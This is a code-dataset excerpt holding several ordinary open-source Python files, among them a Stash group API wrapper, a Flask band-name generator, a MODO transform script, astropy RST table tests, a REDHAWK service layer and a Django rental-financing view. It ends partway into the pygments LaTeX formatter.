repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
robinson96/GRAPE | stashy/stashy/admin/groups.py | 1 | 2006 | from ..helpers import ResourceBase, FilteredIterableResource
from ..errors import ok_or_error, response_or_error
from ..compat import update_doc
class Groups(ResourceBase, FilteredIterableResource):
@response_or_error
def add(self, group):
"""
Add a group, returns a dictionary containing the group name
"""
return self._client.post(self.url(), {}, params=dict(name=group))
@ok_or_error
def delete(self, group):
"""
Delete a group.
"""
return self._client.delete(self.url(), params=dict(name=group))
@ok_or_error
def add_user(self, group, user):
"""
Add a user to a group.
"""
return self._client.post(self.url("/add-user"), dict(context=group, itemName=user))
@ok_or_error
def remove_user(self, group, user):
"""
Remove a user to a group.
"""
return self._client.post(self.url("/remove-user"), dict(context=group, itemName=user))
def more_members(self, group, filter=None):
"""
Retrieves a list of users that are members of a specified group.
filter: return only users with usernames, display names or email addresses containing this string
"""
params = dict(context=group)
if filter:
params['filter'] = filter
return self.paginate("/more-members", params)
def more_non_members(self, group, filter=None):
"""
Retrieves a list of users that are not members of a specified group.
filter: return only users with usernames, display names or email addresses containing this string
"""
params = dict(context=group)
if filter:
params['filter'] = filter
return self.paginate("/more-non-members", params)
update_doc(Groups.all, """
Returns an iterator that will walk all the groups, paginating as necessary.
filter: if specified only group names containing the supplied string will be returned
""")
| bsd-3-clause | 8,213,022,635,487,669,000 | 31.885246 | 105 | 0.631605 | false | 4.214286 | false | false | false |
J216/band_name_generator | main.py | 1 | 1733 | from flask import Flask, render_template
import datetime
from os import listdir
from os.path import isfile, join
import twitter as tw
import image_overlay as ilay
import band_name as bn
app = Flask(__name__)
app.debug = True
names_made=0
page_info = {}
page_info['business_name'] = u"Band Name Generator"
page_info['desciption'] = u"Get your band name generated here."
page_info['about'] = u"We make the band name for real."
page_info['phone'] = u"(900) 985-2781"
page_info['phone_link'] = u"+1"
page_info['address'] = u"Saint Joseph, MO"
page_info['email'] = u"[email protected]"
page_info['facebook'] = u"https://www.facebook.com/jared.haer"
page_info['twitter'] = u"https://twitter.com/jared216"
page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
page_info["moment"]=str(datetime.datetime.now())
@app.route("/")
def index():
page_info["moment"]=str(datetime.datetime.now())
return render_template("index.html",page_info=page_info)
@app.route("/band_name")
def bandName():
global names_made
page_info['band_name']=bn.getName()
bname=page_info['band_name']
p="./static/"
fn_out='images/band_names/'+str(names_made%12+1)+'.png'
print(ilay.makeImage(bname,fn_in='./bg.png',fn_out=p+fn_out))
page_info['band_image']=fn_out
names_made+=1
datetime.datetime.now()
# page_info['tweet_status']=tw.tweetImage(bn.getTweet(bname),ilay.makeImage(bname))
page_info['slides'] = [f for f in listdir('./static/images/band_names/') if isfile(join('./static/images/band_names/', f))]
return render_template("band_name.html", page_info=page_info)
if __name__ == "__main__":
app.run(host="0.0.0.0",port=5004)
| mit | 5,676,462,123,757,967,000 | 33.66 | 127 | 0.677438 | false | 2.937288 | false | false | false |
Zhibade/modo-tool-random-scale-rotate | Scripts/RandomScaleAndRotate.py | 1 | 6496 | #python
# Random scale & rotation tool
# Supports transforming individual mesh items from selection, or each polygon island within the mesh items
# Author: Jose Lopez Romo - Zhibade
import modo
import lx
import random
def query_user_value(user_value):
"""
Utility function for querying user values
"""
return lx.eval("user.value {0} ?".format(user_value))
SCALE_LIMITS_X = [query_user_value('zbRandScaleRot_scaleMinX'), query_user_value('zbRandScaleRot_scaleMaxX')]
SCALE_LIMITS_Y = [query_user_value('zbRandScaleRot_scaleMinY'), query_user_value('zbRandScaleRot_scaleMaxY')]
SCALE_LIMITS_Z = [query_user_value('zbRandScaleRot_scaleMinZ'), query_user_value('zbRandScaleRot_scaleMaxZ')]
SCALE_LIMITS_U = [query_user_value('zbRandScaleRot_scaleMinU'), query_user_value('zbRandScaleRot_scaleMaxU')]
ROT_LIMITS_X = [query_user_value('zbRandScaleRot_rotMinX'), query_user_value('zbRandScaleRot_rotMaxX')]
ROT_LIMITS_Y = [query_user_value('zbRandScaleRot_rotMinY'), query_user_value('zbRandScaleRot_rotMaxY')]
ROT_LIMITS_Z = [query_user_value('zbRandScaleRot_rotMinZ'), query_user_value('zbRandScaleRot_rotMaxZ')]
TRANSLATE_LIMITS_X = [query_user_value('zbRandScaleRot_translateMinX'), query_user_value('zbRandScaleRot_translateMaxX')]
TRANSLATE_LIMITS_Y = [query_user_value('zbRandScaleRot_translateMinY'), query_user_value('zbRandScaleRot_translateMaxY')]
TRANSLATE_LIMITS_Z = [query_user_value('zbRandScaleRot_translateMinZ'), query_user_value('zbRandScaleRot_translateMaxZ')]
APPLY_SCALE = query_user_value('zbRandScaleRot_scale')
APPLY_ROTATION = query_user_value('zbRandScaleRot_rotate')
APPLY_TRANSLATE = query_user_value('zbRandScaleRot_translate')
UNIFORM_SCALE = query_user_value('zbRandScaleRot_uniformScale')
POLYGON_ISLANDS = query_user_value('zbRandScaleRot_polyIslands')
PIVOT_POSITION = query_user_value('zbRandScaleRot_pivotPosition')
VALID_PIVOT_POSITIONS = ['Center', 'Top', 'Bottom', 'Left', 'Right', 'Front', 'Back']
def selection_check(selected_items):
"""
Checks current selection and stops the script if no mesh item is selected
"""
if not selected_items:
lx.eval("dialog.setup warning")
lx.eval("dialog.title Warning")
lx.eval("dialog.msg {No mesh items selected}")
lx.eval('dialog.result ok')
lx.eval('dialog.open')
sys.exit()
def pivot_check():
"""
Checks pivot position value and stops the script if it isn't valid
"""
if PIVOT_POSITION not in VALID_PIVOT_POSITIONS:
lx.eval("dialog.setup warning")
lx.eval("dialog.title Warning")
lx.eval("dialog.msg {Invalid pivot position}")
lx.eval('dialog.result ok')
lx.eval('dialog.open')
sys.exit()
def random_transform():
"""
Transforms current selection randomnly as defined by scale and rotation limits in user values
"""
if APPLY_SCALE:
if UNIFORM_SCALE:
scale_u = random.uniform(SCALE_LIMITS_U[0], SCALE_LIMITS_U[1])
lx.eval("transform.channel scl.X {0}".format(scale_u))
lx.eval("transform.channel scl.Y {0}".format(scale_u))
lx.eval("transform.channel scl.Z {0}".format(scale_u))
else:
scale_x = random.uniform(SCALE_LIMITS_X[0], SCALE_LIMITS_X[1])
scale_y = random.uniform(SCALE_LIMITS_Y[0], SCALE_LIMITS_Y[1])
scale_z = random.uniform(SCALE_LIMITS_Z[0], SCALE_LIMITS_Z[1])
lx.eval("transform.channel scl.X {0}".format(scale_x))
lx.eval("transform.channel scl.Y {0}".format(scale_y))
lx.eval("transform.channel scl.Z {0}".format(scale_z))
if APPLY_ROTATION:
rot_x = random.uniform(ROT_LIMITS_X[0], ROT_LIMITS_X[1])
rot_y = random.uniform(ROT_LIMITS_Y[0], ROT_LIMITS_Y[1])
rot_z = random.uniform(ROT_LIMITS_Z[0], ROT_LIMITS_Z[1])
lx.eval("transform.channel rot.X {0}".format(rot_x))
lx.eval("transform.channel rot.Y {0}".format(rot_y))
lx.eval("transform.channel rot.Z {0}".format(rot_z))
if APPLY_TRANSLATE:
translate_x = random.uniform(TRANSLATE_LIMITS_X[0], TRANSLATE_LIMITS_X[1])
translate_y = random.uniform(TRANSLATE_LIMITS_Y[0], TRANSLATE_LIMITS_Y[1])
translate_z = random.uniform(TRANSLATE_LIMITS_Z[0], TRANSLATE_LIMITS_Z[1])
lx.eval("transform.channel pos.X {0}".format(translate_x))
lx.eval("transform.channel pos.Y {0}".format(translate_y))
lx.eval("transform.channel pos.Z {0}".format(translate_z))
def transform_polygon_islands():
"""
Takes all polygon islands inside the selected mesh items and transforms them randomly.
The pivot of the transformation depends on the user value set in the UI
"""
scene = modo.Scene()
mesh_items = scene.selectedByType('mesh')
selection_check(mesh_items)
for item in mesh_items:
scene.select(item)
geometry = item.geometry
# This mesh will be used to store polygon islands temporalily
final_mesh = scene.addMesh("zbFinalScaledMeshes")
all_polys = list(geometry.polygons)
# Scale all polygon islands and store them in the temporary mesh
while all_polys:
all_polys[0].select(True)
lx.eval("select.polygonConnect m3d false")
lx.eval("select.cut")
temp_mesh = scene.addMesh("zbTempScaleMesh")
scene.select(temp_mesh)
lx.eval("select.paste")
lx.eval("select.type item")
lx.eval("center.bbox {0}".format(PIVOT_POSITION.lower()))
random_transform()
lx.eval("select.cut")
scene.select(final_mesh)
lx.eval("select.paste")
scene.removeItems(temp_mesh)
scene.select(item)
all_polys = list(geometry.polygons)
# Cut all polygon islands back to the original mesh and clean scene
scene.select(final_mesh)
lx.eval("select.all")
lx.eval("select.cut")
scene.select(item)
lx.eval("select.paste")
scene.removeItems(final_mesh)
def transform_mesh_items():
"""
Takes all the selected mesh items and transforms them randomnly.
"""
scene = modo.Scene()
mesh_items = scene.selectedByType('mesh')
selection_check(mesh_items)
for item in mesh_items:
scene.select(item)
random_transform()
if POLYGON_ISLANDS:
pivot_check()
transform_polygon_islands()
else:
transform_mesh_items()
| mit | 3,489,878,135,956,814,300 | 34.692308 | 121 | 0.660406 | false | 3.257773 | false | false | false |
AustereCuriosity/astropy | astropy/io/ascii/tests/test_rst.py | 1 | 4846 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from ....extern.six.moves import cStringIO as StringIO
from ... import ascii
from .common import (assert_equal, assert_almost_equal,
setup_function, teardown_function)
def assert_equal_splitlines(arg1, arg2):
assert_equal(arg1.splitlines(), arg2.splitlines())
def test_read_normal():
"""Normal SimpleRST Table"""
table = """
# comment (with blank line above)
======= =========
Col1 Col2
======= =========
1.2 "hello"
2.4 's worlds
======= =========
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ['Col1', 'Col2'])
assert_almost_equal(dat[1][0], 2.4)
assert_equal(dat[0][1], '"hello"')
assert_equal(dat[1][1], "'s worlds")
def test_read_normal_names():
"""Normal SimpleRST Table with provided column names"""
table = """
# comment (with blank line above)
======= =========
Col1 Col2
======= =========
1.2 "hello"
2.4 's worlds
======= =========
"""
reader = ascii.get_reader(Reader=ascii.RST,
names=('name1', 'name2'))
dat = reader.read(table)
assert_equal(dat.colnames, ['name1', 'name2'])
assert_almost_equal(dat[1][0], 2.4)
def test_read_normal_names_include():
"""Normal SimpleRST Table with provided column names"""
table = """
# comment (with blank line above)
======= ========== ======
Col1 Col2 Col3
======= ========== ======
1.2 "hello" 3
2.4 's worlds 7
======= ========== ======
"""
reader = ascii.get_reader(Reader=ascii.RST,
names=('name1', 'name2', 'name3'),
include_names=('name1', 'name3'))
dat = reader.read(table)
assert_equal(dat.colnames, ['name1', 'name3'])
assert_almost_equal(dat[1][0], 2.4)
assert_equal(dat[0][1], 3)
def test_read_normal_exclude():
"""Nice, typical SimpleRST table with col name excluded"""
table = """
======= ==========
Col1 Col2
======= ==========
1.2 "hello"
2.4 's worlds
======= ==========
"""
reader = ascii.get_reader(Reader=ascii.RST,
exclude_names=('Col1',))
dat = reader.read(table)
assert_equal(dat.colnames, ['Col2'])
assert_equal(dat[1][0], "'s worlds")
def test_read_unbounded_right_column():
"""The right hand column should be allowed to overflow"""
table = """
# comment (with blank line above)
===== ===== ====
Col1 Col2 Col3
===== ===== ====
1.2 2 Hello
2.4 4 Worlds
===== ===== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat[0][2], "Hello")
assert_equal(dat[1][2], "Worlds")
def test_read_unbounded_right_column_header():
"""The right hand column should be allowed to overflow"""
table = """
# comment (with blank line above)
===== ===== ====
Col1 Col2 Col3Long
===== ===== ====
1.2 2 Hello
2.4 4 Worlds
===== ===== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames[-1], "Col3Long")
def test_read_right_indented_table():
"""We should be able to read right indented tables correctly"""
table = """
# comment (with blank line above)
==== ==== ====
Col1 Col2 Col3
==== ==== ====
3 3.4 foo
1 4.5 bar
==== ==== ====
"""
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
assert_equal(dat[0][2], "foo")
assert_equal(dat[1][0], 1)
def test_trailing_spaces_in_row_definition():
""" Trailing spaces in the row definition column shouldn't matter"""
table = """
# comment (with blank line above)
==== ==== ====
Col1 Col2 Col3
==== ==== ====
3 3.4 foo
1 4.5 bar
==== ==== ====
""" # noqa
reader = ascii.get_reader(Reader=ascii.RST)
dat = reader.read(table)
assert_equal(dat.colnames, ["Col1", "Col2", "Col3"])
assert_equal(dat[0][2], "foo")
assert_equal(dat[1][0], 1)
table = """\
====== =========== ============ ===========
Col1 Col2 Col3 Col4
====== =========== ============ ===========
1.2 "hello" 1 a
2.4 's worlds 2 2
====== =========== ============ ===========
"""
dat = ascii.read(table, Reader=ascii.RST)
def test_write_normal():
"""Write a table as a normal SimpleRST Table"""
out = StringIO()
ascii.write(dat, out, Writer=ascii.RST)
assert_equal_splitlines(out.getvalue(), """\
==== ========= ==== ====
Col1 Col2 Col3 Col4
==== ========= ==== ====
1.2 "hello" 1 a
2.4 's worlds 2 2
==== ========= ==== ====
""")
| bsd-3-clause | -1,427,530,822,642,735,900 | 26.072626 | 72 | 0.506603 | false | 3.261104 | true | false | false |
hchiam/cognateLanguage | miniExamples/gerPorPol/evaluate.py | 1 | 7320 | from collections import OrderedDict
from levenshteinDistance import levenshtein as ld
#------------------------
# shared variables:
#------------------------
words = OrderedDict()
words['Eng'] = ''
words['Ger'] = ''
words['Por'] = ''
words['Pol'] = ''
outputFilename = 'output.txt'
allophones = {
'aeiou' : 'a',
'bp' : 'b',
'cjsz' : 'z',
'dt' : 'd',
'fv' : 'v',
'gkq' : 'g',
'hx' : 'h',
'lr' : 'l',
'mn' : 'm',
'w' : 'w',
'y' : 'y'
}
#------------------------
# functions:
#------------------------
def respellWithInitialVowelAndConsonants(word):
for char in word[1:]:
if char in 'aeiou':
word = word[0] + word[1:].replace(char,'')
return word
def respellWithAllophones(word):
for char in word:
for allo in allophones:
if char in allo:
word = word.replace(char,allophones[allo])
return word
def combineOverlappingWords(shortList):
for language in shortList:
for otherlanguage in shortList:
if language != otherlanguage and language != 'Eng' and otherlanguage != 'Eng':
a = shortList[language]
b = shortList[otherlanguage]
for i in range(1, len(b)):
if a.endswith(b[:i]):
shortList[otherlanguage] = ''
shortList[language] = a+b[i:]
return shortList
def evaluateScore_Levenshtein(word,originalWords):
score = 0
score_maximize = 100 # just to keep score positive
score_minimize = 0
for lang in originalWords:
score_minimize += ld(word,lang)
score = score_maximize - score_minimize
return score
def evaluateScore_AlloWithVowels(word,originalWords):
score = 0
scoreLangs = [0] * len(originalWords)
leastEfficientWord = ''.join(originalWords)
# ABZDAVG allo w/ vowels
alloWithVowels = respellWithAllophones(word)
#print 'Allophone Form of Word, with Vowels: ', alloWithVowels
alloOriginalWords = list(originalWords) # careful with creating references that overwrite!
for index, srcWord in enumerate(alloOriginalWords):
alloOriginalWords[index] = respellWithAllophones(srcWord)
#print alloOriginalWords
# get preliminary scores for each language:
for lang, srcWordAllo in enumerate(alloOriginalWords):
for i in range(len(srcWordAllo)):
head = srcWordAllo[:i]
if head in respellWithAllophones(word):
# add to score per matching letter of word:
scoreLangs[lang] += 1
# adjust language scores by number of characters in original words:
for lang, srcWordAllo in enumerate(alloOriginalWords):
scoreLangs[lang] -= len(srcWordAllo)
# language scores are weighted in reverse order
scoreLangs.reverse()
for wt, lang in enumerate(scoreLangs):
score += lang + lang * ((wt+1)/10.0) # make weightings like these to make gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
#print 'language score contribution: ', score
# get preliminary score for word length:
scoreLen = (len(leastEfficientWord) - len(word)) # score increases with shorter word
scoreLen *= 1.1 # this is the weighting for length score
#print 'word length contribution', scoreLen
score += scoreLen
return round(score,2)
def evaluateScore_ConsonantsInOrder(word,originalWords):
score = 0
scoreLangs = [0] * len(originalWords)
leastEfficientWord = ''.join(originalWords)
alloConsonants = list(originalWords) # careful with creating references that overwrite!
alloOfNewWord = respellWithAllophones(word).replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')
#print alloOfNewWord
for index, srcWord in enumerate(alloConsonants):
alloConsonants[index] = respellWithAllophones(srcWord).replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')
#print alloConsonants
# BZDVG
# go through each language's test pattern:
for lang, testPattern in enumerate(alloConsonants):
currentLetterPos = 0
# go through as many letters of that test pattern as possible:
for i in range(1,len(testPattern)):
# if that letter is found in new word then update current letter position (= index+1 since list indices start at 0):
if testPattern[i] in alloOfNewWord:
#print testPattern[i]
currentLetterPos = i+1
# use full word length - the current letter into the test pattern as the score for that language
scoreLangs[lang] = currentLetterPos - len(originalWords[lang])
currentLetterPos = 0
#print scoreLangs
# language scores are weighted in reverse order
scoreLangs.reverse()
for wt, lang in enumerate(scoreLangs):
score += lang + lang * ((wt+1)/10.0) # make weightings like these to make gradient of influence: 0.1, 0.2, 0.3, 0.4, 0.5
# get preliminary score for word length:
scoreLen = (len(leastEfficientWord) - len(word)) # score increases with shorter word
scoreLen *= 1.1 # this is the weighting for length score
#print 'word length contribution', scoreLen
score += scoreLen
return round(score,2)
def evaluateScore_LettersFromEachSource(word,originalWords):
score = 0
for letter in word:
for srcWord in originalWords:
# encourage using words with letters found in all source words
score += 1 if letter in srcWord else 0
return score
def penalizeRepeatedLetterSequences(word):
score = 0
currentLetter = ''
for letter in word:
if letter == currentLetter:
score -= 1
else:
currentLetter = letter
return score
def penalizeLength(word):
score = -len(word)
return score
def penalizeZeroLetters(word):
if word == '':
return -1
return 0
def penalizeNoVowels(word):
score = 0
vowels = 'aeiou'
has = False
for vowel in vowels:
if vowel in word:
score = 1
return score
if len(word) > 1: # don't force a vowel if the word is only 1-letter long
score = -1
return score
def penalizeInstructionComplexity(instruction): # TODO
score = 0
return score
def evaluate(line):
newWord = line.split(',')[0]
originalWords = line.split(',')[2:]
score = 0
score += evaluateScore_AlloWithVowels(newWord, originalWords)
score += evaluateScore_ConsonantsInOrder(newWord, originalWords)
score -= evaluateScore_Levenshtein(newWord, originalWords)
score += evaluateScore_LettersFromEachSource(newWord, originalWords)
score += penalizeRepeatedLetterSequences(newWord)
score += penalizeLength(newWord)
score += penalizeZeroLetters(newWord)
score += penalizeNoVowels(newWord)
# score += penalizeInstructionComplexity(instruction) # TODO
return round(score, 2)
#------------------------
# main part of the program:
#------------------------
# get lines of file into a list:
with open(outputFilename,'r') as f1:
data = f1.readlines()
# fill arrays:
for line in data:
if ',' in line:
print(evaluate(line))
| mit | 8,170,772,491,182,917,000 | 29 | 142 | 0.62377 | false | 3.74808 | true | false | false |
RedhawkSDR/rest-python | model/redhawk.py | 1 | 5760 | #
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of REDHAWK rest-python.
#
# REDHAWK rest-python is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# REDHAWK rest-python is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
"""
redhawk.py
Asynchronous Tornado service for REDHAWK. Maps the functions
in domain.py and caches the domain object.
"""
from _utils.tasking import background_task
from domain import Domain, scan_domains, ResourceNotFound
class Redhawk(object):
__domains = {}
def _get_domain(self, domain_name):
name = str(domain_name)
if not name in self.__domains:
self.__domains[name] = Domain(domain_name)
return self.__domains[name]
##############################
# DOMAIN
@background_task
def get_domain_list(self):
return scan_domains()
@background_task
def get_domain_info(self, domain_name):
dom = self._get_domain(domain_name)
return dom.get_domain_info()
@background_task
def get_domain_properties(self, domain_name):
dom = self._get_domain(domain_name)
return dom.properties()
##############################
# APPLICATION
@background_task
def get_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.find_app(app_id)
@background_task
def get_application_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.apps()
@background_task
def get_available_applications(self, domain_name):
dom = self._get_domain(domain_name)
return dom.available_apps()
@background_task
def launch_application(self, domain_name, app_name):
dom = self._get_domain(domain_name)
return dom.launch(app_name)
@background_task
def release_application(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.release(app_id)
##############################
# COMPONENT
@background_task
def get_component(self, domain_name, app_id, comp_id):
dom = self._get_domain(domain_name)
return dom.find_component(app_id, comp_id)
@background_task
def get_component_list(self, domain_name, app_id):
dom = self._get_domain(domain_name)
return dom.components(app_id)
@background_task
def component_configure(self, domain_name, app_id, comp_id, new_properties):
dom = self._get_domain(domain_name)
comp = dom.find_component(app_id, comp_id)
configure_changes = {}
for prop in comp._properties:
if prop.id in new_properties:
if new_properties[prop.id] != prop.queryValue():
configure_changes[prop.id] = (type(prop.queryValue()))(new_properties[prop.id])
return comp.configure(configure_changes)
##############################
# DEVICE MANAGER
@background_task
def get_device_manager(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.find_device_manager(device_manager_id)
@background_task
def get_device_manager_list(self, domain_name):
dom = self._get_domain(domain_name)
return dom.device_managers()
##############################
# DEVICE
@background_task
def get_device_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.devices(device_manager_id)
@background_task
def get_device(self, domain_name, device_manager_id, device_id):
dom = self._get_domain(domain_name)
return dom.find_device(device_manager_id, device_id)
##############################
# SERVICE
@background_task
def get_service_list(self, domain_name, device_manager_id):
dom = self._get_domain(domain_name)
return dom.services(device_manager_id)
##############################
# GENERIC
@background_task
def get_object_by_path(self, path, path_type):
'''
Locates a redhawk object with the given path, and path type.
Returns the object + remaining path:
comp, opath = locate(ipath, 'component')
Valid path types are:
'application' - [ domain id, application-id ]
'component' - [ domain id, application-id, component-id ]
'device-mgr' - [ domain id, device-manager-id ]
'device' - [ domain id, device-manager-id, device-id ]
'''
domain = self._get_domain(path[0])
if path_type == 'application':
return domain.find_app(path[1]), path[2:]
elif path_type == 'component':
return domain.find_component(path[1], path[2]), path[3:]
elif path_type == 'device-mgr':
return domain.find_device_manager(path[1]), path[2:]
elif path_type == 'device':
return domain.find_device(path[1], path[2]), path[3:]
raise ValueError("Bad path type %s. Must be one of application, component, device-mgr or device" % path_type)
| lgpl-3.0 | 587,551,749,755,926,900 | 31.914286 | 118 | 0.613194 | false | 3.902439 | false | false | false |
verpoorten/immobilier | main/financement.py | 1 | 5583 | ##############################################################################
#
# Immobilier it's an application
# designed to manage the core business of property management, buildings,
# rental agreement and so on.
#
# Copyright (C) 2016-2018 Verpoorten Leïla
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
from django.shortcuts import render, redirect
from datetime import datetime
from main import models as mdl
from dateutil.relativedelta import relativedelta
def new(request, location_id):
location = mdl.contrat_location.find_by_id(location_id)
# Trouver le dernier financement
financement_list = mdl.financement_location.find_by_location(location_id).order_by('date_debut')
financement_dernier = financement_list.last()
nouveau_financement = None
financement = None
if financement_list:
financement = financement_list[0]
# le dupliquer
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = financement_dernier.date_debut
nouveau_financement.date_fin = financement_dernier.date_fin
nouveau_financement.loyer = financement_dernier.loyer
nouveau_financement.charges = financement_dernier.charges
nouveau_financement.index = financement_dernier.index
return render(request, "financementlocation_new.html",
{'old_financement': financement,
'nouveau_financement': nouveau_financement,
'id_location': location.id,
'prev': request.GET.get('prev', None),
'previous': 'location'})
def create(request):
location = mdl.contrat_location.find_by_id(request.POST['id'])
if request.POST.get('cancel_financement_loc_new', None):
previous = request.POST.get('previous', None)
if previous == 'location':
return render(request, "contratlocation_update.html",
{'location': location})
else:
prev = request.POST.get('prev', None)
# todo : récupérer le nouveau financement, adapter l'ancien et sauver le tout en bd
# adaptation du financement courant
financement_courant = location.dernier_financement
financement_list = mdl.financement_location.find_by_location(location.id).order_by('date_debut')
financement_dernier = financement_list.last()
date_fin_initiale = location.date_fin
nouvelle_date_fin_financement_courant = modifer_date_fin_financement_courant(financement_courant, request)
nouveau_financement = nouveau_financement_depuis_precedant(date_fin_initiale, location,
nouvelle_date_fin_financement_courant, request)
# on doit adapter les suivis existantes
suivis_existant = mdl.suivi_loyer.find(financement_courant, nouveau_financement.date_debut, 'A_VERIFIER')
for s in suivis_existant:
s.financement_location = nouveau_financement
s.remarque = 'Indexé'
s.save()
financement_courant = mdl.financement_location.find_by_id(location.financement_courant.id)
if prev == 'fl' or previous == 'location':
return render(request, "contratlocation_update.html",
{'location': location})
return redirect('/contratlocations/')
def nouveau_financement_depuis_precedant(date_fin_initiale, location, nouvelle_date_fin_financement_courant, request):
# creation du nouveau financement
nouveau_financement = mdl.financement_location.FinancementLocation()
nouveau_financement.date_debut = nouvelle_date_fin_financement_courant + relativedelta(days=1)
nouveau_financement.date_fin = date_fin_initiale # j'estime que la date de fin ne change pas
nouveau_financement.loyer = 0
if request.POST.get('loyer', None):
nouveau_financement.loyer = float(request.POST['loyer'].replace(',', '.'))
nouveau_financement.charges = 0
if request.POST.get('charges', None):
nouveau_financement.charges = float(request.POST['charges'].replace(',', '.'))
nouveau_financement.index = 0
if request.POST.get('index', None):
nouveau_financement.index = float(request.POST['index'].replace(',', '.'))
nouveau_financement.contrat_location = location
nouveau_financement.save()
return nouveau_financement
def modifer_date_fin_financement_courant(financement_courant, request,):
nouvelle_date_de_fin = None
if request.POST['date_debut']:
nouvelle_date_de_fin = datetime.strptime(request.POST['date_debut'], '%d/%m/%Y')
nouvelle_date_de_fin = nouvelle_date_de_fin - relativedelta(days=1)
financement_courant.date_fin = nouvelle_date_de_fin
financement_courant.save()
return nouvelle_date_de_fin
| agpl-3.0 | -830,127,123,551,516,400 | 43.632 | 118 | 0.663022 | false | 3.393552 | false | false | false |
nickpascucci/RobotCamera | src/driver/modules/pipelines/resizepipe.py | 1 | 2113 | """An image processing pipeline stage which resizes images.
Using this pipe negates the need for setting resolution directly on the camera,
while still allowing for tuning of the received images. If you encounter a
problem with "Inappropriate IOCTL for device", you might consider using the
default camera resolution and resizing images as needed afterwards."""
import cv
__author__ = "Nick Pascucci ([email protected])"
class ResizePipe:
def __init__(self, next_pipe, x_res=640, y_res=480):
self.next_pipe = next_pipe
self.x_res = x_res
self.y_res = y_res
def process(self, image):
if image.width == self.x_res and image.height == self.y_res:
return image
# Resizing tries to fit the original image into the new destination
# image exactly, so if they don't scale well to each other there may be
# distortion.
if ((image.width % self.x_res != 0 and self.x_res % image.width != 0) or
(image.height % self.y_res != 0 and self.y_res % image.height != 0)):
print ("WARNING: Resize target size does not fit cleanly into "
" original. Distortion of the image may occur.")
print "\tOriginal size: %sx%s" % (image.width, image.height)
print "\tTarget size: %sx%s" % (self.x_res, self.y_res)
# We first create a destination image of the proper size,
# and then call resize() with it to resize the image.
# cv.CreateMat is kind of weird since it takes rows then columns as
# arguments rather than the usual (x, y) ordering.
if type(image) == cv.iplimage:
resized_image = cv.CreateImage((self.x_res, self.y_res),
image.depth, image.nChannels)
else:
resized_image = cv.CreateMat(self.y_res, self.x_res, image.type)
cv.Resize(image, resized_image)
if self.next_pipe:
processed_image = self.next_pipe.process(resized_image)
return processed_image
else:
return resized_image
| gpl-3.0 | -8,751,076,118,497,455,000 | 43.020833 | 81 | 0.619025 | false | 3.862888 | false | false | false |
fusion809/fusion809.github.io-old | vendor/bundle/ruby/2.2.0/gems/pygments.rb-0.6.3/vendor/pygments-main/pygments/formatters/latex.py | 49 | 17273 | # -*- coding: utf-8 -*-
"""
pygments.formatters.latex
~~~~~~~~~~~~~~~~~~~~~~~~~
Formatter for LaTeX fancyvrb output.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import division
from pygments.formatter import Formatter
from pygments.lexer import Lexer
from pygments.token import Token, STANDARD_TYPES
from pygments.util import get_bool_opt, get_int_opt, StringIO, xrange, \
iteritems
__all__ = ['LatexFormatter']
def escape_tex(text, commandprefix):
return text.replace('\\', '\x00'). \
replace('{', '\x01'). \
replace('}', '\x02'). \
replace('\x00', r'\%sZbs{}' % commandprefix). \
replace('\x01', r'\%sZob{}' % commandprefix). \
replace('\x02', r'\%sZcb{}' % commandprefix). \
replace('^', r'\%sZca{}' % commandprefix). \
replace('_', r'\%sZus{}' % commandprefix). \
replace('&', r'\%sZam{}' % commandprefix). \
replace('<', r'\%sZlt{}' % commandprefix). \
replace('>', r'\%sZgt{}' % commandprefix). \
replace('#', r'\%sZsh{}' % commandprefix). \
replace('%', r'\%sZpc{}' % commandprefix). \
replace('$', r'\%sZdl{}' % commandprefix). \
replace('-', r'\%sZhy{}' % commandprefix). \
replace("'", r'\%sZsq{}' % commandprefix). \
replace('"', r'\%sZdq{}' % commandprefix). \
replace('~', r'\%sZti{}' % commandprefix)
DOC_TEMPLATE = r'''
